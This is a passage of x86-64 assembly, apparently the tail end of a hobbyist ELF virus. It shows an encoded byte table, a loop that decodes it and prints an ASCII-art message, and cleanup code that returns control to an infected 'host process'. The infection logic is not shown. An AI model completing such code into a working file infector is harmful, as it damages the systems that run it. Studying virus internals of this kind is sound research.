db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x41
|
||
|
db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57
|
||
|
db 0x57, 0x55, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57
|
||
|
db 0x57, 0x57, 0x57, 0x57, 0x55, 0x55, 0x57, 0x55
|
||
|
db 0x55, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57
|
||
|
db 0x57, 0x57, 0x57, 0x55, 0x57, 0x57, 0x57, 0x57
|
||
|
db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x41
|
||
|
db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57
|
||
|
db 0x57, 0x57, 0x55, 0x57, 0x57, 0x57, 0x57, 0x57
|
||
|
db 0x57, 0x57, 0x57, 0x57, 0x55, 0x55, 0x57, 0x55
|
||
|
db 0x55, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57
|
||
|
db 0x57, 0x57, 0x55, 0x57, 0x57, 0x57, 0x57, 0x57
|
||
|
db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x41
|
||
|
db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57
|
||
|
db 0x57, 0x57, 0x57, 0x55, 0x57, 0x57, 0x57, 0x57
|
||
|
db 0x57, 0x57, 0x57, 0x57, 0x57, 0x55, 0x57, 0x55
|
||
|
db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57
|
||
|
db 0x57, 0x55, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57
|
||
|
db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x41
|
||
|
db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57
|
||
|
db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57
|
||
|
db 0x57, 0x57, 0x57, 0x57, 0x57, 0x55, 0x57, 0x55
|
||
|
db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57
|
||
|
db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57
|
||
|
db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x41
|
||
|
db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57
|
||
|
db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57
|
||
|
db 0x57, 0x57, 0x57, 0x57, 0x57, 0x55, 0x57, 0x55
|
||
|
db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57
|
||
|
db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57
|
||
|
db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x41
|
||
|
db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57
|
||
|
db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57
|
||
|
db 0x57, 0x57, 0x57, 0x57, 0x57, 0x55, 0x57, 0x55
|
||
|
db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57
|
||
|
db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57
|
||
|
db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x41
|
||
|
db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57
|
||
|
db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57
|
||
|
db 0x57, 0x57, 0x57, 0x57, 0x57, 0x55, 0x57, 0x55
|
||
|
db 0x41
|
||
|
len = $-msg
|
||
|
|
||
|
payload:
|
||
|
pop rsi ; setting up decoding loop
|
||
|
mov rcx, len
|
||
|
lea rdi, [r15 + 3001]
|
||
|
|
||
|
.decode:
|
||
|
lodsb ; load byte from rsi into al
|
||
|
sub al, 50 ; decoding it
|
||
|
xor al, 5
|
||
|
stosb ; store byte from al into rdi
|
||
|
loop .decode ; sub 1 from rcx and continue loop until rcx = 0
|
||
|
|
||
|
lea rsi, [r15 + 3001] ; decoded payload is at [r15 + 3000]
|
||
|
mov rax, SYS_WRITE
|
||
|
mov rdi, STDOUT ; display payload
|
||
|
mov rdx, len
|
||
|
syscall
|
||
|
|
||
|
cleanup:
|
||
|
add rsp, 5000 ; restoring stack so host process can run normally, this also could use some improvement
|
||
|
pop rsp
|
||
|
pop rdx
|
||
|
|
||
|
v_stop:
|
||
|
xor rdi, rdi ; exit code 0
|
||
|
mov rax, SYS_EXIT
|
||
|
syscall
|